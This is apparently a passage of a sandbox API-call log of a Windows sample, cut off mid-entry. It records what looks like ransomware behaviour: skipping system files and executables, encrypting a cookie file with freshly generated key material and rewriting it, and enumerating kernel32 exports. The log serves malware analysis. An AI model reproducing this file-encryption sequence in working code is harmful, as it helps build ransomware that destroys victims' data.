(lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="thumbs.db") returned -1 [0181.343] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="Bootfont.bin") returned -1 [0181.343] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ") returned 49 [0181.343] lstrcmpiW (lpString1="knweQ", lpString2="lnk") returned -1 [0181.343] lstrcmpiW (lpString1="knweQ", lpString2="exe") returned 1 [0181.343] lstrcmpiW (lpString1="knweQ", lpString2="sys") returned -1 [0181.343] lstrcmpiW (lpString1="knweQ", lpString2="dll") returned 1 [0181.343] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.343] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ") returned 49 [0181.343] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.343] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ" [0181.343] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.347] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=366) returned 1 [0181.347] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.347] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.351] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.351] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.354] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.355] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.358] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.358] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.495] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.495] CloseHandle (hObject=0x288) returned 1 [0181.495] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.495] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.497] CloseHandle (hObject=0x0) returned 0 [0181.497] CloseHandle (hObject=0x284) returned 1 [0181.497] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.497] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.497] GetTickCount () returned 0x1134c3d [0181.497] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.498] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.498] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.498] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.498] lstrlenA (lpString="kernel32.dll") returned 12 [0181.498] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.498] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.498] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.498] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.498] lstrlenA (lpString="ADDATOMA") returned 8 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.498] lstrlenA (lpString="ADDATOMW") returned 8 [0181.498] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.498] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.499] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.499] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.499] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.499] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.499] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.499] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.499] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.499] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.499] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.499] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.499] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.499] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.499] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.499] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.499] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.499] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.499] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.499] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.500] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.500] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.500] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.500] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.500] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.500] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.500] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.500] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.500] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.500] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.500] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.500] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.500] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.500] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.500] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.500] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.500] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.500] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.500] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.501] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.501] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.501] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.501] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.501] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.501] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.501] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.501] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.501] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.502] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.502] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.502] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.502] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.502] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.502] lstrlenA (lpString="BEEP") returned 4 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.502] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.502] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.502] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.502] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.502] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.502] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.502] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.502] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.502] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.502] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.502] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.502] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.503] lstrlenA (lpString="CANCELIO") returned 8 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.503] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.503] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.503] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.503] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.503] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.503] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.503] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.503] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.503] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.503] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.503] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.503] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.503] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.503] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.503] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.503] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.503] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.503] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.504] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.504] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.504] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.504] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.504] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.504] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.504] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.504] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: 